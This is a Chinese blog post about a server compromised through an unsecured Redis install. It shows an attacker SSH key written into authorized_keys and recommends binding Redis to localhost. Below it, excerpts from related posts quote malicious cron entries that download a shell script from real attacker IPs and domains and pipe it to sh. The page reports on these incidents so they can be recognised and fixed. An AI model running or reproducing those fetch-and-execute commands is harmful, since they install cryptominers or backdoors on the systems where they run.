安装redis后，系统异常，被黑客攻击入侵

最新推荐文章于 2024-05-15 11:40:15 发布

BecauseOfYouIKnew

最新推荐文章于 2024-05-15 11:40:15 发布

阅读量2.7k

点赞数

分类专栏： linux 文章标签： redis 黑客

本文链接：https://blog.csdn.net/BecauseOfYouIKnew/article/details/50952383

版权

linux 专栏收录该内容

0 篇文章 0 订阅

订阅专栏

如果你的系统在安装redis后，同时在使用默认redis配置文件的情况下，系统发生异常，那你就应该去查看你的/root/.ssh/authorized_keys的文件，如果出现类似代码：说明你的系统被黑客通过redis入侵了，`REDIS0006þ^@^@^GcrackitA<90>

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDao4L1Hk/El05qbO5NeBAOFTPOVLR08flBXH2b/VaKY5bfCecIHvtgFd+lE4PxkDr3T43/bX4dMU9BLCyE0Yrv……………………………………………………………………………………

ÿú<88><8c>^Úp=|`

建议重装redis,修改redis.conf，添加bind:127.0.0.1等，或者重装系统。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

BecauseOfYouIKnew

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

黑客攻防Redis拉锯战之Root提权

qq_40907977的博客

05-19

1976

转载来源：记一次重大安全事故，黑客攻防Redis拉锯战之Root提权：http://www.safebase.cn/article-259347-1.html 摘要: 黑客攻击前言要想做一名优秀的程序员，除去个人扎实的基础技能这一不可或缺的因素，还有一个更加不能忽略的潜在意识。那就是——安全防范意识！为什么说，安全防范意识会成为另外一个不可或缺的因素，你且听我慢慢道来。服务器被植入木马linux其实这件事情呢，也就发生在前几天。公司需要部署一套新的 … 前言要想做一名优秀的程序员，除去个人扎实的基础

这39个端口黑客最常攻击，看看有哪些？

最新发布

网络技术联盟站

08-28

587

在计算机网络中，端口是指网络通信的端点，用于标识网络中不同的服务或应用程序。每个端口都对应一个特定的网络协议，并且在一个主机的IP地址上可以有多个端口同时开放。端口的编号范围从0到65535，其中较低编号的端口通常用于众所周知的服务（称为“知名端口”），例如HTTP（80端口）、HTTPS（443端口）、FTP（21端口）等。这些端口由IANA（Internet Assigned Numbers Authority）分配给特定的服务和协议。常见的服务如HTTP、FTP、SMTP等都在此范围内。

参与评论您还未登录，请先登录后发表或查看评论

redis被黑客入侵

程序员陆通

02-12

1487

[root@iZ112fail84Z home]# redis-cli 127.0.0.1:6379> keys * 1) “crackit” 127.0.0.1:6379> get crackit “\n\n\n*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh\n\n\n\n”这个程序每5分钟执行一个shell

【Linux】云服务器的Redis被黑

m0_62645012的博客

02-28

1250

重装完系统，因为学习的需要需要下载apache mysql 和 redis ，就在这个时候我突然意识到会不会是redis 的问题，因为最近才学到redis，在云服务器被入侵的前几天才安装的redis。我就登录腾讯云网页开始查看主机情况，发现主机是开着的，但就是ssh登录不进去，怀疑密码被改了，我就开始通过腾讯云修改密码，修改后可以登录。因为方便本地使用连接测试，就关闭了防火墙，开发了6379端口与所有ip都可以访问。这几天开学没咋注意短信，周一才发现腾讯云服务器被入侵，我就开始登录处理，结果发现无法登录。

redis漏洞被攻击

dwdqsa的博客

03-05

590

redis在无密码且无bind情况下黑客可以拿到root凌晨四点服务器被攻击之后服务器内存一直被udevs占满,疑似挖矿进程，删除会自动恢复去掉执行权限 chmod -x 后杀掉进程服务器正常...

记录第一次云服务器redis被黑

m0_73520938的博客

04-24

311

redis里莫名奇妙被写入四个键值对，backup1,backup2,backup3,backup4，内容是奇奇怪怪的sh脚本：*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh。施展百度大法后发现原来被挖矿了.....（redis明明设置了密码.....）解决办法：设置更复杂的redis连接密码，安全组，防火墙。

Redis配置错误导致主机被黑

若鱼的专栏

04-16

1644

现象以及如何处理参考：http://blog.51cto.com/hld1992/2047658公司有台做voip的服务器最近CPU总是跑满，这机器自从交给厂家搭好环境后基本就没怎么管它，于是进去查看进程，top了下（见下图）这个叫wnTKYg的进程很诡异，已经把CPU吃光了，上网一查，原来是中了挖矿的马。（啊，我的天。这只是一个单核1G内存的阿里云主机）既然被入侵了，那就得干掉它，下面是解决过程...

linux中redis的安装配置，后门漏洞修复及其攻击方法整合

Java_Mrsun的博客

06-27

655

Linux上redis安装：需先在服务器上安装yum（虚拟机可使用挂载的方式安装）安装配置所需要的环境运行指令： yum -y install gcc进入解压文件执行make 指令进行编译执行指令make PREFIX=/usr/local/redis install指定安装位置进行安装将解压目录下的redis.conf拷贝一份到安装路径的bin目录根目录下（redis.conf可修改端口号密...

本文通过实例介绍了Redis的基础知识、数据类型、数据结构以及典型应用场景值得一看！

AI天才研究院

08-06

1434

2017年，Redis是基于MIT许可发布的一个开源的高性能键值数据库，其开发语言为C语言。它提供了多种数据类型（strings、hashes、lists、sets、sorted sets等），分布式支持（可横向扩展），内存存储，持久化功能，事务处理功能等。作为一种高性能的键值数据库，Redis在处理海量数据时表现优异。在本篇文章中，我将会从Redis的一些基础知识入手，介绍Redis中的几个重要概念、数据类型、数据结构以及应用场景。希望能够帮助读者快速理解Redis的核心知识。

系统性能与可靠性分析的思考——系统性能篇

AI天才研究院

08-07

744

随着互联网产品、服务、平台等日益壮大的业务规模和复杂程度，越来越多的公司面临系统性能与可用性挑战。为了保障系统高效运行，提升用户体验及系统稳定性，企业应当进行全方位的性能监控，保证其在运行过程中始终保持高质量的服务水平。1）系统性能简介：什么是系统性能？如何衡量系统性能？2）系统性能瓶颈分析：系统存在哪些性能瓶颈？如何通过工具来识别和定位系统性能瓶颈？3）系统性能优化方法论：系统性能优化主要关注哪些方面？如何进行系统性能优化？4）系统性能调优实践：如何才能做到快速准确地定位并解决系统性能瓶颈？

记一次云服务器因redis漏洞被黑

m0_46435741的博客

11-21

1876

您所使用的设备（IP：***）存在对其他服务器端口（TCP：6379）的攻击行为大晚上的，在床上躺着，突然腾讯云给我发个消息和邮件，如下：吓我一跳，定睛一看，端口6379，不是radis的默认端口吗？前些阵子写项目就用自己的服务器搭了一个radis服务器，不会被黑了吧？百般纳闷，反正说是24小时内，不管，先睡觉早上爬起来，想用Xshell登录一下服务器看看，结果死活登不上，再在控制台看看，结果还是登不上，心想：完了，不会真被黑了吧？用腾讯云自动实例检测，提示CPU近期占有率高达92%，但是我在服务

记一次Redis被入侵（被黑）处理过程

nelson的博客

05-22

3445

通常作为一名后端程序员，并没有系统的学习过关于服务器安防相关的知识，遇到服务器被黑的情况往往比较迷茫，不知道从何下手。服务器可能遭受的攻击多种多样，以下主要讲述的是我本次遇到的一次服务器被黑客拿来当矿机的处理过程。攻击的发现之所以发现服务器被攻击了是因为有用户反馈系统卡顿非常严重，我知道一般用户反馈描述的那个时间点不应该会有这么高的延迟的，所以就登录服务器查看以下CPU等资源的消耗情况。（挖矿...

黑客攻击第二次，开redis一瞬间

热门推荐

史上最强生物的博客

01-24

1万+

被黑第二波

入侵事件

为了忘却的专栏

11-15

1391

1、/etc/crontab文件被修改： REDIS0006þ^@^@^Gcrackit@T SHELL=/bin/sh #* * * * * root wget -P /tmp http://104.223.72.167:8080/shell.sh ÿÉ6GþÊN 2、shell.sh文件： rm -rf shell.sh wget

Redis-第10章 RDB持久化

guolong1983811的专栏

01-23

1696

第10章 RDB持久化 Redis是一个键值对数据库服务器，服务器中通常包含着任意个非空数据库，而每个非空数据库中又可以包含任意个键值对，为了方便起见，我们将服务器中的非空数据库以及它们的键值对统称为数据库状态。举个例子，图10-1展示了一个包含三个非空数据库的Redis服务器，这三个数据库以及数据库中的键值对就是该服务器的数据库状态。图10-1 数据库状态示例因为Redis是内

Redis命令介绍之列表的操作命令（第一部分）

Ghosind

07-04

629

介绍并以示例的形式展示Redis中列表相关命令（第一部分），包括LPUSH、LPOP、LLEN、LRANGE、LINDEX等命令。

[ Redis ] Redis 未授权访问漏洞被利用，服务器登陆不上

awueu25069的博客

04-14

129

一、缘由：　　突然有一天某台服务器远程登陆不上，试了好几个人的账号都行，顿时慌了，感觉服务器被黑。在终于找到一个还在登陆状态的同事后，经查看/ect/passwd 和/etc/passwd-异常，文件中的账户都被删除，且第一行加上了REDIS0006,还有莫名其妙的账户加入，google之后确认redis漏洞被利用，服务器被攻破。二、解决办法：　　　　最好有一个漏扫工具...

云服务器上Redis数据库被攻击实录+总结

青衫客36的博客

05-15

1282

通过以上步骤，可以详细了解攻击过程，并采取有效的措施防止类似攻击的发生。增强 Redis 服务器和系统的安全性是关键，确保只有受信任的用户能够访问和管理服务器。计划任务格式：计划任务的格式是一个定时器表达式后跟执行命令。这条任务每 15 分钟执行一次curl命令下载并执行远程脚本。文件路径：攻击者将 Redis 配置为将数据持久化到cron计划任务目录，如。这导致持久化的内容成为cron守护进程的一部分计划任务。持久化机制的滥用：通过 Redis 的SAVE。

Redis 6379 被攻击

RealGUO的博客

03-18

2174

Redis 6379 被攻击刚开始使用redis，把端口打开了，然后没有设置密码，导致被恶意攻击，这里记录一下。 [root@realguo ~]# redis-cli 127.0.0.1:6379> keys * 1) "backup2" 2) "backup1" 3) "backup4" 4) "backup3" 127.0.0.1:6379> get backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://zzhreceive.anondn